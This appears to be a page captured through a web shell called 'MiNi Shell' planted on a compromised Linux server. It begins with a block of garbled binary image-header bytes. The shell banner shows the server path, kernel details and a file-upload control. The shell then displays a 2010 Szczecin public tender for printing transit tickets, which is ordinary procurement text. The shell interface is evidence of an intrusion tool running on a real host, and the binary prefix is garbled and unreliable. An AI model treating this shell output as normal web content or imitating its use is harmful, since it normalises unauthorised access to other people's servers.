JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100120/12943-N-2010.html

<p class="kh_header"><b>Szczecin: Druk i dostawa biletów miesięcznych, trzymiesięcznych, semestralnych, dobowych i wielodobowych, 10-przejazdowych, rodzinnych weekendowych, blankietów do biletów i biletów wolnej jazdy na rok 2010 i 2011 (I kwartał)</b><br>
<b>Numer ogłoszenia: 12943 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 091 4800444,4800434, faks 091 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i dostawa biletów miesięcznych, trzymiesięcznych, semestralnych, dobowych i wielodobowych, 10-przejazdowych, rodzinnych weekendowych, blankietów do biletów i biletów wolnej jazdy na rok 2010 i 2011 (I kwartał).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Druk i dostawa biletów miesięcznych, trzymiesięcznych, semestralnych, dobowych i wielodobowych, 10-przejazdowych, rodzinnych weekendowych, blankietów do biletów i biletów wolnej jazdy na rok 2010 i 2011 (I kwartał).2.	Wzory biletów, blankietów i wizytówek stanowią załącznik nr 6 do SIWZ.
3.	Opis przedmiotu zamówienia
I. Zakres rzeczowy i szacunek ilościowy:

1. BILETY  MIESIĘCZNE   drukowane  w  9  nominałach  (łącznie w ilości  885 100 szt.)                               	na linie zwykłe w 4 nominałach,
	na linie pospieszne w 5 nominałach,
1)  DANE  TECHNICZNE:
a)	papier offset o gramaturze 120-150 g m2,
b)	wymiary biletu 40 mm x 70 mm,
c)	w arkuszach po 10 szt.,
d)	arkusze z perforacją pionową i poziomą,
e)	 podział na dni miesiąca,
f)	na rewersie nadrukowana treść :  
	Bilet ważny od dnia wyznaczonego do dnia poprzedzającego ten dzień w miesiącu następnym do godz. 24.00. Bilet ważny jest razem z blankietem (ten zapis nie dotyczy biletów o nominale 150,00 zł Na Okaziciela),
	www.zditm.szczecin.pl
g)	awers biletu drukowany w pełnej gamie kolorów i odcieni. Zamawiający wymaga wyróżnienia kolorów biletów zwykłych od pośpiesznych, wzory i kolory uzgadniane co miesiąc z Zamawiającym, logo  zamawiającego  umieszczone na awersie biletu,
h)	 zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
	hologram  typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym (kształt zmieniany co 2 m-ce),
	 rok, miesiąc i cenę zabezpieczone farbą fluorescencyjną w kolorach uzgodnionych z Zamawiającym,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu  wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.

2. BILETY  TRZYMIESIĘCZNE   drukowane  w 8  nominałach  ( łącznie w ilości 28 200 szt.)
	na linie zwykłe w 4 nominałach ,
	 na linie pospieszne w 4 nominałach, 
1)	DANE  TECHNICZNE:
a)	 papier offset o gramaturze 120 -150 g m2,
b)	 wymiary biletu  40 mm x 70 mm,
c)	 w arkuszach po 10 szt.,
d)	 arkusze z perforacją pionową i poziomą,
e)	 podział na 12 miesięcy,
f)	 awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)	 rewers  drukowany w 2 kolorach,
h)	logo zamawiającego umieszczone na awersie biletu,
i)	zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
	hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym, 
	 cenę i rok zabezpieczone farbą fluorescencyjną,
	 mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	 wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.

3. BILETY  SEMESTRALNE  -  4-miesięczne drukowane  w 4  nominałach  (łącznie w ilości  do  3 700 szt.):	na linie zwykłe  w 2 nominałach,
	na linie pospieszne w 2 nominałach,
1)  DANE TECHNICZNE:
a)	papier o gramaturze 120 -150 g m2,
b)	wymiary biletu 40 mm x 70 mm,
c)	w arkuszach po 10 szt.,
d)	arkusze z perforacją pionową i poziomą,
e)	podział na 12 miesięcy,
f)	awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)	rewers drukowany w 2 kolorach,
h)	logo zamawiającego umieszczone na awersie biletu,
i)	zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
	hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym,
	cenę i rok zabezpieczone farbą fluorescencyjną,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.

4. BILETY   SEMESTRALNE   -  5-miesięczne  drukowane  w  4  nominałach  ( łącznie w ilości   4 900 szt.): 
	na linie zwykłe  w 2 nominałach,
	 na linie pospieszne w 2 nominałach,
1)  DANE TECHNICZNE:
a)	papier o gramaturze 120 -150 g m2,
b)	wymiary biletu 40 mm x 70 mm,
c)	w arkuszach po 10 szt.,
d)	arkusze z perforacją pionową i poziomą,
e)	podział na 12 miesięcy,
f)	awers biletu drukowany w pełnej gamie kolorów i odcieni,
g)	rewers drukowany w 2 kolorach,
h)	logo zamawiającego umieszczone na awersie biletu,
i)	   zabezpieczony przed kopiowaniem elektronicznym, zawierać będzie między innymi:
	hologram typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym, 
	cenę i rok zabezpieczone farbą fluorescencyjną,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	wyraźny, równo wypełniony farbą siedmiocyfrowy numer biletu wykonany farbą  w kolorze wg szczegółowych późniejszych ustaleń z Zamawiającym.
      
5. BILETY  DOBOWE I WIELODOBOWE -   drukowane  w  6  nominałach    (łącznie w  ilości   658 000 szt.          
1)  DANE  TECHNICZNE:
a)	papier offset o gramaturze  130-150 g m2,  
b)	wymiary biletu 75 mm x 35 mm,
c)	sklejone grzbietem w bloczkach po 20 szt.,
d)	awers biletu drukowany w pełnej gamie kolorów i odcieni, 
e)	rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
	Bilet ważny przez 24 (120 lub 240) godziny (godzin) od chwili skasowania.
	Bilet na okaziciela.
	Bilet na linie zwykłe, pospieszne i nocne.
	W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik.
f)	logo zamawiającego,
g)	zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
	serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	hologram typu Hot stamping o rozmiarach do 0,3 x 3,5 cm,
	na rewersie gilosz umieszczony na polu kasowania,

6. KARNETY 10 - PRZEJAZDOWE  Z  UPUSTEM - drukowane   w   6 nominałach  (łącznie  w  ilości  207 100 szt. )
     1) DANE  TECHNICZNE:
a)	papier offset o gramaturze130-150 g m2,
b)	wymiary biletu 35 mm x 420 mm, przy czym wymiary kuponu kontrolnego wraz z biletem nr 10  wynoszą: 35 mm x 60 mm, a każdego następnego biletu w karnecie 35 mm x 40 mm,
c)	sklejone w bloczkach po 100 szt.,
d)	logo zamawiającego, 
e)	zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
	serię i numer biletu zabezpieczone farbą fluorescencyjną (na każdym bilecie karnetu) i numer kolejny biletu w karnecie numerowany od ostatniego biletu karnetu do kuponu kontrolnego,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	hologram typu Hot stamping o rozmiarach do 0,4 x 3,5 cm umieszczony na kuponie kontrolnym.

7.  BILETY  RODZINNE  WEEKENDOWE  w ilości  4 000 szt. 

1)  DANE  TECHNICZNE:
a)	papier o gramaturze 80 g m2, 
b)	wymiary biletu 75 mm x 35 mm,
c)	sklejone grzbietem w bloczkach po 20 szt.,
d)	awers biletu drukowany w pełnej gamie kolorów i odcieni,
e)	rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
	Bilet ważny do 22.00 od chwili skasowania.
	Bilet na linie zwykłe i pospieszne.
	Bilet jednodniowy; może być wykorzystany w wybranym dniu  świątecznym, sobotę lub niedzielę.
	W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik.
f)	logo zamawiającego,
g)	zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
	serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	hologram typu Hot stamping o rozmiarach 0,3 lub 0,4 x 3,5 cm,
	na rewersie gilosz umieszczony na polu kasowania,

8. BILETY  GRUPOWE -  drukowane  w 2 rodzajach  (łącznie w ilości  7 000 szt.)
	do 15 osób + 1 opiekun,
	do 25 osób + 2 opiekunów,                                                     
1)  DANE  TECHNICZNE:
a)	papier o gramaturze 80 g m2,
b)	wymiary biletu 75 mm x 35 mm,
c)	sklejone grzbietem w bloczkach po 20 szt.,
d)	awers biletu drukowany w pełnej gamie kolorów i odcieni,
e)	rewers biletu drukowany w 2 kolorach, na rewersie nadrukowana treść:
	Bilet na okaziciela,
	Bilet na linie zwykłe i pospieszne,
	W sprawach spornych uwzględnia się datę i czas drukowany przez kasownik,
f)	logo zamawiającego,
g)	zabezpieczony przed kopiowaniem technikami elektronicznymi będzie zawierać:
	serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą,
	mikrodruk wg szczegółowych późniejszych ustaleń z Zamawiającym,
	hologram typu Hot stamping o rozmiarach 0,3 lub 0,4 x 3,5 cm,
	na rewersie gilosz umieszczony na polu kasowania,

9. BLANKIETY DO BILETU OKRESOWEGO  - drukowane w 2 rodzajach (łącznie w ilości 49 000 szt.)                                                                                         
	blankiet do biletu okresowego na 1 linię,
	blankiet do biletu okresowego sieciowego,
1)  DANE  TECHNICZNE:
a)	papier o gramaturze  - karton 250g m2,
b)	wymiary blankietu  93 mm x 54 mm,
c)	logo zamawiającego,
d)	serię i siedmiocyfrowy numer biletu zabezpieczone farbą fluorescencyjną, seria i numer wyraźny, równo wypełniony farbą.

10. BILETY WOLNEJ  JAZDY - w  ilości  300 szt.    
1)  DANE  TECHNICZNE:
a)	papier o gramaturze  - karton 250g m2,
b)	wymiary biletu  86 mm x 54 mm,
c)	logo zamawiającego,
d)	siedmiocyfrowy numer biletu zabezpieczony farbą fluorescencyjną, numer wyraźny i równo wypełniony farbą,
e)	hologram  typu Hot stamping o rozmiarach do 1 x 1 cm i w kształcie uzgodnionym z Zamawiającym.

 11. WIZYTÓWKI - łącznie w ilości  300 szt.
1)  DANE  TECHNICZNE:
a)	papier o gramaturze  - karton 250g m2,
b)	wymiary wizytówki   93 mm x 55 mm,
c)	logo zamawiającego.


II.  Warunki realizacji zamówienia:

1.	Wykonanie wszystkich nadruków musi być wyraźne i czytelne, nie pozostawiające  wątpliwości jaka to cyfra lub litera.
2.	Podane ilości poszczególnych rodzajów biletów, blankietów czy wizytówek mogą ulec zmianie w zależności od popytu na rynku o + - 20 %  przy czym wartość zamówienia nie ulegnie zmianie.
3.	W załączonych do SIWZ wzorach biletów Zamawiający zastrzega sobie prawo zmian np.: logo, nominału biletu, nazwę biletu itp. bez wpływu na cenę druku oferowaną przez wykonawcę.
4.	Zamawiający będzie informował Wykonawcę o ewentualnych zmianach z  wyprzedzeniem w terminach określonych w umowie.      
5.	Wzory wszystkich  biletów, legitymacji  zostaną szczegółowo  omówione  po  podpisaniu umowy.
6.	Załączone wzory biletów mogą zostać zmodyfikowane przez wykonawcę po    zaakceptowaniu przez zamawiającego.


UWAGA:
Zastosowany w biletach hologram musi być aplikowany na gorąco i posiadać certyfikat Międzynarodowego Stowarzyszenia Producentów Hologramów, lub rejestrację w Urzędzie Patentowym.


III. Zamawiający przewiduje udzielanie zamówień uzupełniających na podstawie art. 67 ust 1 pkt. 6 ustawy prawo zamówień publicznych. Zamówienie uzupełniające może zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, o wartości nie przekraczającej 10 % wartości zamówienia podstawowego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 78.15.20.00-7, 78.23.00.00-8, 34.98.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2)	posiadania wiedzy i doświadczenia, poprzez wykazanie, że:
a)   wykonali należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonują) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum  dwie usługi podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna drukowanie biletów na rzecz organizatorów lub wykonawców komunikacji miejskiej.
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4)	sytuacji ekonomicznej i finansowej.
2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w pkt 2 ma obowiązek złożyć następujące oświadczenia i dokumenty: 
1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
2)	Wykaz wykonanych, (a w przypadku świadczeń okresowych również wykonywanych) usług (prac podobnych) w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczeni, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru, stanowiącego załącznik nr 4 do siwz oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie,
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
5.	W przypadku podmiotów, o których mowa w pkt 4, przedkładane przez wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty. 
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy mają obowiązek złożyć następujące dokumenty:
1)	Oświadczenie o braku podstaw do wykluczenia, według wzoru stanowiącego załącznik nr 2 do siwz,
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną we własnym imieniu
2)	Aktualny odpis z właściwego rejestru (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy.
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
6.	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców, jeżeli Wykonawca nie przewiduje udziału podwykonawców należy wpisać - nie dotyczy);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące, że Wykonawca posiada system zabezpieczeń produkcji biletów i przechowywania papieru, w szczególności:
a)	system alarmowy włamania i napadu lub 24 godzinna ochrona przez wyspecjalizowane służby ochroniarskie,
b)	produkcja biletów na terenie jednego zamkniętego obiektu w celu zabezpieczenia i kontroli obiegu dokumentacji produkcyjnej, normowania materiałów nanoszenia zabezpieczeń biletów, rozliczania produkcji oraz nadzorowania niszczenia odpadów,
c)	kontrolę wewnętrzną produkcji i ciągów technologicznych produkcji biletów.
W przypadku składania oferty wspólnej należy złożyć jeden dokument
5)	Wzory biletów wykonywanych dla innych odbiorców, zawierających hologram,
W przypadku składania oferty wspólnej należy złożyć jeden dokument
6)	Dokumenty poświadczające zastrzeżenie hologramu (rejestracja w Międzynarodowym Stowarzyszeniu Producentów Hologramów, lub rejestracja w Urzędzie Patentowym).
W przypadku składania oferty wspólnej należy złożyć jeden dokument.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego ul. Klonowica 5, 71-241 Szczecin III piętro, pok.318..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego ul. Klonowica 5, 71-241 Szczecin Sekretariat - III piętro, pok.314..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com